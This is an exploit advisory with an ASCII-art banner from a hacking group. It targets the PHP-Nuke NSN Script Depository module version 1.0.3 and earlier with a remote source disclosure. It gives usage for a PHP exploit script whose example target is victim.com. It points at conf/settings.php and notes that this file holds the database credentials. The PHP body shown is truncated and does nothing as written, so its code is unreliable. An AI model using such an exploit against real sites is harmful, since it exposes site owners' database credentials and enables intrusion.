|
---------------------------------------------------------------=0D
____ __________ __ ____ __ =0D
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ =0D
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\=0D
| | | \ | |/ \ \___| | /_____/ | || | =0D
|___|___| /\__| /______ /\___ >__| |___||__| =0D
\/\______| \/ \/ =0D
---------------------------------------------------------------=0D
=0D
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org =0D
=0D
---------------------------------------------------------------=0D
=0D
PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source Disclosure=0D
=0D
---------------------------------------------------------------=0D
=0D
#By KiNgOfThEwOrLd=0D
=0D
---------------------------------------------------------------=0D
Exploit=0D
=0D
=0D
/*=0D
Usage: 31337.php?targ=http://[target]/[phpnuke_path]&file=[file]=0D
Example: 31337.php?targ=http://victim.com/phpnuke&file=conf/settings.php=0D
*/=0D
$targ = $_GET['targ'];=0D
$file = $_GET['file'];=0D
echo '=0D
';=0D
?>=0D
=0D
Trick=0D
=0D
In conf/settings.php there are the database credentials ;)=0D
---------------------------------------------------------------